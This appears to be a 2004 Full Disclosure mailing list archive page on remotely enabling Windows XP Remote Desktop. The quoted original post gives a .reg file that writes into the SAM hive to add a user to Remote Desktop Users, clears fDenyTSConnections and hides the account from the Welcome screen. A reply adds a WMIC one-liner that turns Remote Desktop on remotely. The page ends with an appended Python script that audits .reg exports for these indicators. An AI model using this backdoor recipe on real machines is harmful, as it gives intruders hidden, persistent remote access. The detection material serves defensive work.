Full Disclosure mailing list archives
RE: XP Remote Desktop Remote Activation
From: "Dominick Baier" <seclists () leastprivilege com>
Date: Sat, 2 Oct 2004 17:43:11 +0200
if you have an administrator password for the machine you can just use WMIC to turn remote desktop on.

wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server" CALL SetAllowTSConnections 1

dominick
www.leastprivilege.com

-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Fixer
Sent: Saturday, 2 October 2004 06:51
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] XP Remote Desktop Remote Activation

XP Remote Desktop Remote Activation

Information
____________________________________________________________________

Windows XP Professional provides a service called Remote Desktop, which allows a user to remotely control the desktop as if he or she were in front of the system locally (a la VNC, pcAnywhere, etc.). By default, Remote Desktop is shipped with this service turned off and only the Administrator is allowed access to this service. It is possible, however, to modify a series of registry keys that may allow a malicious user who has already gained a command shell to activate Remote Desktop and add a user they have created for themselves, as well as to hide that user so that it will not show up as a user in the Remote Desktop user list. The instructions for this are attached. Additionally, I have listed a sample .reg file of the type that is discussed in the instructions below.

_____________________________________________________________________

Final Stuff

To the Frozen Chozen...On-On (www.frozen-chozen-h3.org)

On to the exploit....
Fixer

_____________________________________________________________________

.reg file (remember, the xx xx are the values you need to change)

Windows Registry Editor Version 5.00

; Remote Desktop Users alias (RID 0x22B) in the SAM hive
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B]
"C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00,\
  00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\
  01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\
  00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\
  00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\
  00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\
  00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\
  00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
  00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\
  6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\
  00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\
  20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\
  00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\
  67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\
  00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\
  00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00

; 0 allows Terminal Services (Remote Desktop) connections
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

; 0 hides the named account from the Welcome screen
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"lus3r"=dword:00000000

(obviously change "lus3r" to the name of the account you created)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
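The three registry locations in the thread above (a direct write under the SAM hive, fDenyTSConnections cleared under the Terminal Server key, and a dword 0 under Winlogon\SpecialAccounts\UserList) are exactly what a defender wants to spot when reviewing a registry export or a .reg file found on a host. The following audit script is an added example and not code from the original posts or from either poster; it parses .reg syntax (including backslash line continuation of hex values) and reports those three indicators. SAMPLE_REG is a constructed export that mirrors the key paths from the thread; its hex blob is a shortened placeholder, not a real SAM alias record.

```python
"""Audit a Windows .reg export for the Remote Desktop activation indicators
discussed in this thread: a direct write under the SAM hive, fDenyTSConnections
cleared under the Terminal Server key, and an account hidden from the Welcome
screen through Winlogon\\SpecialAccounts\\UserList.

Added example, not code from the original posts. SAMPLE_REG below is constructed
for the demonstration; its hex blob is a placeholder, not a real SAM record.
"""
import re

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")
SAM_PREFIX = "HKEY_LOCAL_MACHINE\\SAM\\SAM\\"

# Constructed sample export mirroring the three key paths from the thread.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B]
"C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00,\
  00,00,00,00,00,d8,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"lus3r"=dword:00000000
"""


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: (type, raw_value)}}.

    A trailing backslash continues a hex value onto the next line, so those
    lines are joined first. Types come out as 'string', 'dword', 'hex',
    'hex(7)' and so on, exactly as written in the export (lower-cased).
    """
    joined = re.sub(r"\\\r?\n\s*", "", text)
    keys = {}
    current = None
    for raw_line in joined.splitlines():
        line = raw_line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^("(?:[^"\\]|\\.)*"|@)=(.*)$', line)
        if not m or current is None:
            continue
        name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
        rhs = m.group(2)
        if rhs.startswith('"'):
            vtype, value = "string", rhs[1:-1]
        elif ":" in rhs:
            vtype, value = rhs.split(":", 1)
            vtype = vtype.lower()
        else:
            vtype, value = "unknown", rhs
        keys[current][name] = (vtype, value)
    return keys


def _lookup(keys, wanted):
    """Registry paths are case-insensitive; find a key regardless of case."""
    for path, values in keys.items():
        if path.lower() == wanted.lower():
            return values
    return {}


def audit_reg(text):
    """Return (indicator, detail) pairs for the three indicators named above."""
    keys = parse_reg(text)
    findings = []
    # Alias records written straight into HKLM\SAM bypass the account
    # management APIs, so no "member added to group" event is logged.
    for path in keys:
        if path.lower().startswith(SAM_PREFIX.lower()):
            findings.append(("sam_direct_write", path))
    # fDenyTSConnections = 0 means Terminal Services connections are allowed.
    vtype, value = _lookup(keys, TS_KEY).get("fDenyTSConnections", (None, None))
    if vtype == "dword" and int(value, 16) == 0:
        findings.append(("rdp_enabled", "fDenyTSConnections=0"))
    # A dword 0 under SpecialAccounts\UserList hides that account from the
    # Welcome screen, which is how the thread conceals the added user.
    for name, (vtype, value) in _lookup(keys, USERLIST_KEY).items():
        if vtype == "dword" and int(value, 16) == 0:
            findings.append(("hidden_account", name))
    return findings


if __name__ == "__main__":
    for indicator, detail in audit_reg(SAMPLE_REG):
        print(f"{indicator:18} {detail}")
```

Run against the constructed sample it reports all three indicators; an export whose fDenyTSConnections is 1 and that has no SAM or UserList keys reports nothing. The same parser can be pointed at `reg export` output from a live system to compare the Terminal Server and UserList keys against a known-good baseline.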
Current thread:
- XP Remote Desktop Remote Activation Fixer (Oct 02)
- Re: XP Remote Desktop Remote Activation morning_wood (Oct 02)
- Re: XP Remote Desktop Remote Activation Joel R. Helgeson (Oct 02)
- RE: XP Remote Desktop Remote Activation Dominick Baier (Oct 02)
- Re: XP Remote Desktop Remote Activation Fixer (Oct 02)
- RE: XP Remote Desktop Remote Activation Larry Seltzer (Oct 02)
- Re: XP Remote Desktop Remote Activation H D Moore (Oct 03)
- Re: XP Remote Desktop Remote Activation Fixer (Oct 03)
- <Possible follow-ups>
- RE:XP Remote Desktop Remote Activation RandallM (Oct 02)
- Re: XP Remote Desktop Remote Activation Fixer (Oct 02)
- Re: XP Remote Desktop Remote Activation morning_wood (Oct 02)